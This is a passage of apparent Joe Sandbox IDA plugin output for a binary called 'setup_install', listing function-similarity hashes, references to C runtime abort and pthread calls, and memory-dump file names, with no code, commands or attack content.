                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3055046cfbd0de2c0c9f23a5069084da6a159ae29afc094f35837725654855a9
                                        • Instruction ID: 79ec71f74329095f6696feb7df9a4166e10158c2bd9ec3302e9d13eacdcd7194
                                        • Opcode Fuzzy Hash: 3055046cfbd0de2c0c9f23a5069084da6a159ae29afc094f35837725654855a9
                                        • Instruction Fuzzy Hash: FD0166728086160BDB209E2984003B6BBD1EF82314F59887ACA8137382C63CAC1256CC
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 2fcfee8aabd778d64db534bf6e43aadcc4d28b80d37252eb6a6c5622f20ed807
                                        • Instruction ID: 03cf69813cde9077153431dcbc9252be9c6caf13a4dcfe703bcaeb3274cb744f
                                        • Opcode Fuzzy Hash: 2fcfee8aabd778d64db534bf6e43aadcc4d28b80d37252eb6a6c5622f20ed807
                                        • Instruction Fuzzy Hash: 4DF0A9316083158BC710EF19E4411BAF7F5EF45355F400D3FE599A3251D339E9198699
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eaa4741039abefe21291fa2710eef4dd58a6148a36f4639c05576c8844b480a1
                                        • Instruction ID: 574f13a9adc7fd23449c4731b1980048cb77c0db64a0c2182d4dae25f5aa0e92
                                        • Opcode Fuzzy Hash: eaa4741039abefe21291fa2710eef4dd58a6148a36f4639c05576c8844b480a1
                                        • Instruction Fuzzy Hash: 98F0C87290836507D724AE158451375BBA09B42318F58087FDDA237382C23EEC57969E
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: f2a531fe56fae01eb129bbdfb363083d6eb4acca61ee05b22db7c7a2d810f2af
                                        • Instruction ID: 02f552c7384f49c4b9b023fe1bd18d223b4938769ace1abbcccc49ddba7301a0
                                        • Opcode Fuzzy Hash: f2a531fe56fae01eb129bbdfb363083d6eb4acca61ee05b22db7c7a2d810f2af
                                        • Instruction Fuzzy Hash: A6F0827280C3468AD771AE168145275BBE4AB42314F985C6FDE81333D2823CAC56969F
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 076a00976dfb80bcdb6f4658677b80d7519e49772048efb089ddc15baa560268
                                        • Instruction ID: 77fd5f2651f63aab6c2ed36661040157c27f924d65b9393d475c9b9bc4cfe686
                                        • Opcode Fuzzy Hash: 076a00976dfb80bcdb6f4658677b80d7519e49772048efb089ddc15baa560268
                                        • Instruction Fuzzy Hash: 71E01232A0821386C320DE2685411B7B2F5EA85744F155D3F9456B3642E635ED05419F
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 01a1d99a90d6c707e848fdad04094c9b2cd7c764a29037a37c17a44a7eaed4cb
                                        • Instruction ID: 6569aedd147723a9b7e9a083ae98b087864d58d252bbd6b9aae0acc0521a0971
                                        • Opcode Fuzzy Hash: 01a1d99a90d6c707e848fdad04094c9b2cd7c764a29037a37c17a44a7eaed4cb
                                        • Instruction Fuzzy Hash: 85E030319593068BC251FF09A08906AF7F5FAC5304F2529AED64073205C774E8118A4A
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 425b95c8954d8954866e041d2ea67ae6ae64fd65efa557b980d85819405087e3
                                        • Instruction ID: 47d45a21dc9da5cbf119aed57b7a39833456db12926cd7b5308aee2411d07cef
                                        • Opcode Fuzzy Hash: 425b95c8954d8954866e041d2ea67ae6ae64fd65efa557b980d85819405087e3
                                        • Instruction Fuzzy Hash: 1AE0863290C70686CB14EE2684511F9F7F1DF46308F106C2EE55673401D328FD02465D
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 43b77c182e1026021a3827c2adf456a1a16ed12c9f066326263567961f0f22b4
                                        • Instruction ID: 3fb2bab94def2682de04cc624690b9885afd2e6146762c07f2723b2a82d0c594
                                        • Opcode Fuzzy Hash: 43b77c182e1026021a3827c2adf456a1a16ed12c9f066326263567961f0f22b4
                                        • Instruction Fuzzy Hash: F6E04F32A693028BC250EF1AA1890A9F7B5FAC6300F5429AED540B3245C735E810464A
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: eb61d258ec19aa3b9dabd00b3b32eb4974483a2cb9952fc191203196eaf02b32
                                        • Instruction ID: 27e75b87c8c556204d3e58a011ac7557aa32cd94c1b453a40c3bbf23f6ac0874
                                        • Opcode Fuzzy Hash: eb61d258ec19aa3b9dabd00b3b32eb4974483a2cb9952fc191203196eaf02b32
                                        • Instruction Fuzzy Hash: F4D0A733F0C303868220EF3745410B6F6F4EA06344F002C2EE545B3541C728EC0141AF
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 7c34f5ddf73a498a8dba9dc715669dcc7f8a671f9b35c7c1efc8a1a8cf7afd97
                                        • Instruction ID: bbe6826697165056da68c048438b54108aef425b2c7be6467ff2312765969d2d
                                        • Opcode Fuzzy Hash: 7c34f5ddf73a498a8dba9dc715669dcc7f8a671f9b35c7c1efc8a1a8cf7afd97
                                        • Instruction Fuzzy Hash: CCD0123394C309468510FE5615920F9F3B5DA47329F953D2EE60133192572DEC82559F
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: a688913ad4fa65ed137303da6d8d0c00b3ab03f337747d8a89eab188a2335a5e
                                        • Instruction ID: 646c923cc7ebc6a68aa9e321f5a77be5ca020489a79533d5842a560ae8c36f7c
                                        • Opcode Fuzzy Hash: a688913ad4fa65ed137303da6d8d0c00b3ab03f337747d8a89eab188a2335a5e
                                        • Instruction Fuzzy Hash: 92D01233A4C30946C130FEA615520FAF2B4CA47308F557C2FAA0533152576CEC42559F
                                        APIs
                                        • abort.MSVCRT ref: 0040F490
                                        • pthread_once.LIBWINPTHREAD-1 ref: 0040F4EE
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$pthread_once
                                        • String ID:
                                        • API String ID: 3910317518-0
                                        • Opcode ID: 6ec3d5b9bd6f69669cd65bffb03aa232b755a847752ff0c4c29b247166523656
                                        • Instruction ID: 736a26c4a6b40e3f1f17c53e74789277cc966c9f01987e300ea8d8fcb34b0e56
                                        • Opcode Fuzzy Hash: 6ec3d5b9bd6f69669cd65bffb03aa232b755a847752ff0c4c29b247166523656
                                        • Instruction Fuzzy Hash: BF51D5B19087418BD720CF28C08079ABBE1FF85328F19487EE9D567396C379A849CB85
                                        APIs
                                          • Part of subcall function 0040E520: strlen.MSVCRT ref: 0040E5A3
                                        • pthread_once.LIBWINPTHREAD-1 ref: 0040F4EE
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$pthread_oncestrlen
                                        • String ID:
                                        • API String ID: 2914753974-0
                                        • Opcode ID: be6be2bec18d56986fe5741742b30037397fa534f6d81c010a8ec38caa09bf24
                                        • Instruction ID: 07d3691a36234da053407c49e703b9b408d380c6a60faa69308048b3a78be5c2
                                        • Opcode Fuzzy Hash: be6be2bec18d56986fe5741742b30037397fa534f6d81c010a8ec38caa09bf24
                                        • Instruction Fuzzy Hash: 5F312AB010C3C4DAEB21DB29A9847567FD5AB96328F0485BED7845F2D3D3BA4408C76E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
